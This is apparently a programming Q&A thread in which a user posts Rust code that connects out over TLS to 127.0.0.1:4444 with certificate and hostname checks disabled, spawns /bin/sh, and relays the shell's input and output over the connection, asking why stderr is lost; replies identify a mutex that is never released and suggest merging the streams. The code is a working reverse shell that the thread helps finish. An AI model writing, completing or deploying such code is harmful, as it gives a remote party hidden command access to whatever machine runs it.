Redirect stdio over TLS
Previously I have asked this question and got an answer (Redirect stdio over TLS in Rust) but having not practised Rust for some time, I have some problems understanding the code and so trying to re implement a solution again.
While I try to understand the code, here is my problem:
I managed to redirect stdin and stdout but not stderr, can someone advise me on the problem with my code?
async fn connect() -> std::io::Result<()> {
    let mut connection = tokio::net::TcpStream::connect("127.0.0.1:4444").await?;

    let mut tlsconnector_builder = tokio_native_tls::native_tls::TlsConnector::builder();
    tlsconnector_builder.danger_accept_invalid_certs(true);
    tlsconnector_builder.use_sni(false);
    tlsconnector_builder.danger_accept_invalid_hostnames(true);

    let native_tls_connector = tlsconnector_builder.build().unwrap();

    let tokio_tls_connector = tokio_native_tls::TlsConnector::from(native_tls_connector);
    let tls_connector = tokio_tls_connector
        .connect("127.0.0.1:4444", connection)
        .await;

    let mut child_process = tokio::process::Command::new("/bin/sh")
        .stdin(std::process::Stdio::piped())
        .stdout(std::process::Stdio::piped())
        .stderr(std::process::Stdio::piped())
        .spawn()?;

    let mut child_stdin = child_process.stdin.take().expect("cannot open stdin");
    let mut child_stdout = child_process.stdout.take().expect("cannot open stdout");
    let mut child_stderr = child_process.stderr.take().expect("cannot open stderr");

    match tls_connector {
        Ok(tls_stream) => {
            let (mut reader, mut writer) = tokio::io::split(tls_stream);

            let writer_arc = Arc::new(tokio::sync::Mutex::new(writer));
            let writer_clone = Arc::clone(&writer_arc);

            let stdin_task = tokio::spawn(async move {
                tokio::io::copy(&mut reader, &mut child_stdin).await;
            });

            let stdout_task = tokio::spawn(async move {
                let mut temp = writer_clone.lock().await;
                let mut writer = temp.deref_mut();

                tokio::io::copy(&mut child_stdout, &mut writer).await;
            });

            let writer_clone = Arc::clone(&writer_arc);

            let stderr_task = tokio::spawn(async move {
                let mut temp = writer_clone.lock().await;
                let mut writer = temp.deref_mut();

                tokio::io::copy(&mut child_stderr, &mut writer).await;
            });

            futures::join!(stdin_task, stdout_task, stderr_task);
        }
        Err(error) => {
            println!("Error establishing TLS connection");
        }
    }

    Ok(())
}

In my testing, I could see command output from the remote terminal that I connected to and I can also execute commands from the remote terminal, but I cannot see error messages.

Hi @DarkBee
I have edited the post to include more details on what I observed

Your stdout_task acquires the writer lock and keeps it forever, so your stderr_task can't acquire it and remains blocked on the writer_clone.lock().await line.

Hi @Jmb
How should I rewrite the code? Do you have any suggestions? Is there a way to let the stdout_task release the lock?

You can merge the child_stdout and child_stderr streams into a single stream, then have a single copy task to send the merged stream to the writer.

Hi @Jmb
Thanks, I will take a look at that method
